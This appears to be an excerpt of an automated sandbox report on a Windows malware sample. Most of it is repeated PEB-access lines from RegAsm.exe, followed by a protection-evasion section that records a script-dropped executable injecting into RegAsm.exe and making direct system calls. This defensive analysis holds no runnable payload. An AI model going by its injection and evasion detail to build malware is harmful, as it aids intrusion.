Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C9E6F2 mov eax, dword ptr fs:[00000030h] | 4_2_02C9E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C9E6F2 mov eax, dword ptr fs:[00000030h] | 4_2_02C9E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C9E6F2 mov eax, dword ptr fs:[00000030h] | 4_2_02C9E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CA06F1 mov eax, dword ptr fs:[00000030h] | 4_2_02CA06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CA06F1 mov eax, dword ptr fs:[00000030h] | 4_2_02CA06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CDD6F0 mov eax, dword ptr fs:[00000030h] | 4_2_02CDD6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CA368C mov eax, dword ptr fs:[00000030h] | 4_2_02CA368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CA368C mov eax, dword ptr fs:[00000030h] | 4_2_02CA368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CA368C mov eax, dword ptr fs:[00000030h] | 4_2_02CA368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CA368C mov eax, dword ptr fs:[00000030h] | 4_2_02CA368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C24690 mov eax, dword ptr fs:[00000030h] | 4_2_02C24690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C24690 mov eax, dword ptr fs:[00000030h] | 4_2_02C24690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C5C6A6 mov eax, dword ptr fs:[00000030h] | 4_2_02C5C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1D6AA mov eax, dword ptr fs:[00000030h] | 4_2_02C1D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1D6AA mov eax, dword ptr fs:[00000030h] | 4_2_02C1D6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C176B2 mov eax, dword ptr fs:[00000030h] | 4_2_02C176B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C176B2 mov eax, dword ptr fs:[00000030h] | 4_2_02C176B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C176B2 mov eax, dword ptr fs:[00000030h] | 4_2_02C176B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C566B0 mov eax, dword ptr fs:[00000030h] | 4_2_02C566B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C3C640 mov eax, dword ptr fs:[00000030h] | 4_2_02C3C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CE866E mov eax, dword ptr fs:[00000030h] | 4_2_02CE866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CE866E mov eax, dword ptr fs:[00000030h] | 4_2_02CE866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C5A660 mov eax, dword ptr fs:[00000030h] | 4_2_02C5A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C5A660 mov eax, dword ptr fs:[00000030h] | 4_2_02C5A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C59660 mov eax, dword ptr fs:[00000030h] | 4_2_02C59660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C59660 mov eax, dword ptr fs:[00000030h] | 4_2_02C59660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C52674 mov eax, dword ptr fs:[00000030h] | 4_2_02C52674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C9E609 mov eax, dword ptr fs:[00000030h] | 4_2_02C9E609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C51607 mov eax, dword ptr fs:[00000030h] | 4_2_02C51607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C5F603 mov eax, dword ptr fs:[00000030h] | 4_2_02C5F603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C3260B mov eax, dword ptr fs:[00000030h] | 4_2_02C3260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C3260B mov eax, dword ptr fs:[00000030h] | 4_2_02C3260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C3260B mov eax, dword ptr fs:[00000030h] | 4_2_02C3260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C3260B mov eax, dword ptr fs:[00000030h] | 4_2_02C3260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C3260B mov eax, dword ptr fs:[00000030h] | 4_2_02C3260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C3260B mov eax, dword ptr fs:[00000030h] | 4_2_02C3260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C3260B mov eax, dword ptr fs:[00000030h] | 4_2_02C3260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C23616 mov eax, dword ptr fs:[00000030h] | 4_2_02C23616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C23616 mov eax, dword ptr fs:[00000030h] | 4_2_02C23616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C62619 mov eax, dword ptr fs:[00000030h] | 4_2_02C62619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C3E627 mov eax, dword ptr fs:[00000030h] | 4_2_02C3E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C56620 mov eax, dword ptr fs:[00000030h] | 4_2_02C56620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C58620 mov eax, dword ptr fs:[00000030h] | 4_2_02C58620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F626 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F626 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F626 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F626 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F626 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F626 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F626 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F626 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F626 mov eax, dword ptr fs:[00000030h] | 4_2_02C1F626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C2262C mov eax, dword ptr fs:[00000030h] | 4_2_02C2262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CF5636 mov eax, dword ptr fs:[00000030h] | 4_2_02CF5636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C2C7C0 mov eax, dword ptr fs:[00000030h] | 4_2_02C2C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C257C0 mov eax, dword ptr fs:[00000030h] | 4_2_02C257C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C257C0 mov eax, dword ptr fs:[00000030h] | 4_2_02C257C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C257C0 mov eax, dword ptr fs:[00000030h] | 4_2_02C257C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C2D7E0 mov ecx, dword ptr fs:[00000030h] | 4_2_02C2D7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C427ED mov eax, dword ptr fs:[00000030h] | 4_2_02C427ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C427ED mov eax, dword ptr fs:[00000030h] | 4_2_02C427ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C427ED mov eax, dword ptr fs:[00000030h] | 4_2_02C427ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C247FB mov eax, dword ptr fs:[00000030h] | 4_2_02C247FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C247FB mov eax, dword ptr fs:[00000030h] | 4_2_02C247FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CDF78A mov eax, dword ptr fs:[00000030h] | 4_2_02CDF78A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CA97A9 mov eax, dword ptr fs:[00000030h] | 4_2_02CA97A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CAF7AF mov eax, dword ptr fs:[00000030h] | 4_2_02CAF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CAF7AF mov eax, dword ptr fs:[00000030h] | 4_2_02CAF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CAF7AF mov eax, dword ptr fs:[00000030h] | 4_2_02CAF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CAF7AF mov eax, dword ptr fs:[00000030h] | 4_2_02CAF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CAF7AF mov eax, dword ptr fs:[00000030h] | 4_2_02CAF7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C207AF mov eax, dword ptr fs:[00000030h] | 4_2_02C207AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C4D7B0 mov eax, dword ptr fs:[00000030h] | 4_2_02C4D7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CF37B6 mov eax, dword ptr fs:[00000030h] | 4_2_02CF37B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F7BA mov eax, dword ptr fs:[00000030h] | 4_2_02C1F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F7BA mov eax, dword ptr fs:[00000030h] | 4_2_02C1F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F7BA mov eax, dword ptr fs:[00000030h] | 4_2_02C1F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F7BA mov eax, dword ptr fs:[00000030h] | 4_2_02C1F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F7BA mov eax, dword ptr fs:[00000030h] | 4_2_02C1F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F7BA mov eax, dword ptr fs:[00000030h] | 4_2_02C1F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F7BA mov eax, dword ptr fs:[00000030h] | 4_2_02C1F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F7BA mov eax, dword ptr fs:[00000030h] | 4_2_02C1F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1F7BA mov eax, dword ptr fs:[00000030h] | 4_2_02C1F7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C33740 mov eax, dword ptr fs:[00000030h] | 4_2_02C33740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C33740 mov eax, dword ptr fs:[00000030h] | 4_2_02C33740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C33740 mov eax, dword ptr fs:[00000030h] | 4_2_02C33740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CF3749 mov eax, dword ptr fs:[00000030h] | 4_2_02CF3749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C5674D mov esi, dword ptr fs:[00000030h] | 4_2_02C5674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C5674D mov eax, dword ptr fs:[00000030h] | 4_2_02C5674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C5674D mov eax, dword ptr fs:[00000030h] | 4_2_02C5674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C20750 mov eax, dword ptr fs:[00000030h] | 4_2_02C20750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C62750 mov eax, dword ptr fs:[00000030h] | 4_2_02C62750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C62750 mov eax, dword ptr fs:[00000030h] | 4_2_02C62750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CA4755 mov eax, dword ptr fs:[00000030h] | 4_2_02CA4755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1B765 mov eax, dword ptr fs:[00000030h] | 4_2_02C1B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1B765 mov eax, dword ptr fs:[00000030h] | 4_2_02C1B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1B765 mov eax, dword ptr fs:[00000030h] | 4_2_02C1B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C1B765 mov eax, dword ptr fs:[00000030h] | 4_2_02C1B765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C28770 mov eax, dword ptr fs:[00000030h] | 4_2_02C28770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h] | 4_2_02C30770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h] | 4_2_02C30770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h] | 4_2_02C30770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h] | 4_2_02C30770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h] | 4_2_02C30770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h] | 4_2_02C30770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h] | 4_2_02C30770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h] | 4_2_02C30770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h] | 4_2_02C30770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h] | 4_2_02C30770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h] | 4_2_02C30770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C30770 mov eax, dword ptr fs:[00000030h] | 4_2_02C30770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C25702 mov eax, dword ptr fs:[00000030h] | 4_2_02C25702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C25702 mov eax, dword ptr fs:[00000030h] | 4_2_02C25702
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C27703 mov eax, dword ptr fs:[00000030h] | 4_2_02C27703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C5C700 mov eax, dword ptr fs:[00000030h] | 4_2_02C5C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C20710 mov eax, dword ptr fs:[00000030h] | 4_2_02C20710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C50710 mov eax, dword ptr fs:[00000030h] | 4_2_02C50710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C5F71F mov eax, dword ptr fs:[00000030h] | 4_2_02C5F71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C5F71F mov eax, dword ptr fs:[00000030h] | 4_2_02C5F71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C23720 mov eax, dword ptr fs:[00000030h] | 4_2_02C23720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C3F720 mov eax, dword ptr fs:[00000030h] | 4_2_02C3F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C3F720 mov eax, dword ptr fs:[00000030h] | 4_2_02C3F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C3F720 mov eax, dword ptr fs:[00000030h] | 4_2_02C3F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CDF72E mov eax, dword ptr fs:[00000030h] | 4_2_02CDF72E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C5C720 mov eax, dword ptr fs:[00000030h] | 4_2_02C5C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C5C720 mov eax, dword ptr fs:[00000030h] | 4_2_02C5C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02CE972B mov eax, dword ptr fs:[00000030h] | 4_2_02CE972B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C19730 mov eax, dword ptr fs:[00000030h] | 4_2_02C19730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C19730 mov eax, dword ptr fs:[00000030h] | 4_2_02C19730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_02C55734 mov eax, dword ptr fs:[00000030h] | 4_2_02C55734
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CFB73C mov eax, dword ptr fs:[00000030h]4_2_02CFB73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CFB73C mov eax, dword ptr fs:[00000030h]4_2_02CFB73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CFB73C mov eax, dword ptr fs:[00000030h]4_2_02CFB73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CFB73C mov eax, dword ptr fs:[00000030h]4_2_02CFB73C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2973A mov eax, dword ptr fs:[00000030h]4_2_02C2973A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C2973A mov eax, dword ptr fs:[00000030h]4_2_02C2973A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5273C mov eax, dword ptr fs:[00000030h]4_2_02C5273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5273C mov ecx, dword ptr fs:[00000030h]4_2_02C5273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C5273C mov eax, dword ptr fs:[00000030h]4_2_02C5273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C9C730 mov eax, dword ptr fs:[00000030h]4_2_02C9C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CF54DB mov eax, dword ptr fs:[00000030h]4_2_02CF54DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02C204E5 mov ecx, dword ptr fs:[00000030h]4_2_02C204E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02CC94E0 mov eax, dword ptr fs:[00000030h]4_2_02CC94E0
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe, File created: p_Cm7afCdw.exe.0.dr
Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe, Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtWriteVirtualMemory: Direct from: 0x77762E3C
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtMapViewOfSection: Direct from: 0x77762D1C
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtUnmapViewOfSection: Direct from: 0x77762D3C
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtNotifyChangeKey: Direct from: 0x77763C2C
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtCreateMutant: Direct from: 0x777635CC
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtResumeThread: Direct from: 0x777636AC
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtProtectVirtualMemory: Direct from: 0x77757B2E
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtQuerySystemInformation: Direct from: 0x77762DFC
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtAllocateVirtualMemory: Direct from: 0x77762BFC
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtReadFile: Direct from: 0x77762ADC
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtDelayExecution: Direct from: 0x77762DDC
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtWriteVirtualMemory: Direct from: 0x7776490C
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtQueryInformationProcess: Direct from: 0x77762C26
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtResumeThread: Direct from: 0x77762FBC
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtCreateUserProcess: Direct from: 0x7776371C
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtSetInformationThread: Direct from: 0x777563F9
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtAllocateVirtualMemory: Direct from: 0x77763C9C
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtSetInformationThread: Direct from: 0x77762B4C
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtQueryAttributesFile: Direct from: 0x77762E6C
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtClose: Direct from: 0x77762B6C
